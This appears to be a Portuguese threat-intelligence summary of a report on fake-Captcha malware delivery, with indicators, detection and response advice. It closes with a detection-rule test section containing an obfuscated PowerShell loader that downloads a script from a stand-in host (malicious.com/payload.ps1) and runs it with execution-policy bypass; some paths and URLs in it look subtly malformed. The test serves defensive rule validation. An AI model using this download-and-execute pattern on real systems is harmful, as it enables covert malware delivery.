SOC Prime Bias: Médio

27 Jan 2026 17:11
newspaper icon Censys

Vivendo na Web: Como a Infraestrutura de Confiança Tornou-se uma Interface de Distribuição de Malware

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
Vivendo na Web: Como a Infraestrutura de Confiança Tornou-se uma Interface de Distribuição de Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sumário

O relatório examina um ecossistema de “Captcha Falso” em grande escala que utiliza interfaces de verificação web confiáveis para entregar cargas maliciosas. A semelhança visual entre iscas não é um sinal de atribuição confiável, porque o mesmo padrão de front-end pode estar em cima de diferentes cadeias de execução—PowerShell, VBScript, instaladores MSI e entrega de notificações push dirigidas por servidor. Usando hash perceptual de alto volume de capturas de tela, a análise mapeia como o ecossistema está organizado e enfatiza a separação entre a interface do usuário e o fluxo de trabalho subjacente de carga. Recomenda-se que os defensores vão além de indicadores cosméticos e priorizem a detecção da lógica de execução e infraestrutura.

Investigação

A Censys identificou 9.494 ativos de Captcha Falso e usou hash perceptual para agrupá-los por similaridade visual, encontrando um cluster dominante semelhante ao Cloudflare que representa cerca de 70% dos sites observados. Uma revisão mais aprofundada descobriu 32 variantes distintas de cargas abrangendo scripts dirigidos por área de transferência, instaladores baseados em MSI e entrega push ao estilo Matrix Push C2. A análise da infraestrutura mostrou grupos de servidores backend separados apoiando cada técnica, com exemplos citados incluindo 95.164.53.115 e ghost.nestdns.com.

Mitigação

A detecção não deve depender apenas das características da isca visual ou do comportamento da área de transferência. Em vez disso, monitore permissões de notificação de navegador incomuns, padrões de download e execução de PowerShell ou VBScript, lançamentos de MSI originados de URLs temáticos de verificação e tráfego de rede associado a endpoints conhecidos do Matrix Push C2. Bloqueie ou execute em sandbox páginas de verificação suspeitas e treine usuários para conceder permissões de navegador apenas em sites confiáveis e esperados.

Resposta

Quando uma página de Captcha Falso é encontrada, alerte sobre a execução subsequente de PowerShell, VBScript ou MSI, bem como eventos de assinatura de notificação. Correlacione a atividade do endpoint com indicadores de rede como os IPs e domínios maliciosos referenciados. Isole sistemas impactados, capture memória volátil e realize uma análise forense de quaisquer cargas recuperadas.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Base deve ter sido aprovado.

Racional: Esta seção detalha a execução exata da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa de Ataque & Comandos:
    O atacante precisa buscar uma carga maliciosa enquanto esconde o URL de download. Eles constroem o URL em tempo de execução usando códigos de caracteres, incorporam a string “enc” (frequentemente vista em cargas codificadas em Base64), e então utilizam Net.WebClient.DownloadFile para recuperar o script. Esta técnica corresponde ao foco da regra em “ofuscação + Net.WebClient”. Passos:

    1. Gere o URL de download através da reconstrução de caracteres: 
      $url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1"
    2. Crie uma variável de espaço reservado contendo a string “enc” para satisfazer o segundo termo de detecção: 
      $encTag = "enc"
    3. Invoque o download: 
      $wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, "$env:TEMPpayload.ps1")
    4. Execute a carga baixada (opcional para o teste): 
      powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"

    A presença de Net.WebClient.DownloadFile, a palavra enc, e o uso de [char]::FromCharCode (via a abreviatura [char]) garante que a regra seja acionada.

  • Script de Teste de Regressão:

    # -------------------------------------------------
# Loader de PowerShell Simulado – corresponde à regra Sigma
# -------------------------------------------------
# 1. Reconstrua o URL de download usando códigos de caracteres
$url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49)
# O acima soletra: https://malicious.com/payload.ps1

# 2. Insira o token "enc" para satisfazer a regra de detecção
$encTag = "enc"

# 3. Realize o download
$wc = New-Object System.Net.WebClient
$destination = "$env:TEMPpayload.ps1"
$wc.DownloadFile($url, $destination)

# 4. (Opcional) Execute a carga
# powershell -ExecutionPolicy Bypass -File $destination

  • Comandos de Limpeza:

    # Remova a carga baixada
$payloadPath = "$env:TEMPpayload.ps1"
if (Test-Path $payloadPath) {
    Remove-Item -Force $payloadPath
}

# Remova o objeto WebClient (coleta de lixo gerenciada automaticamente)
Write-Host "Limpeza completa."

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente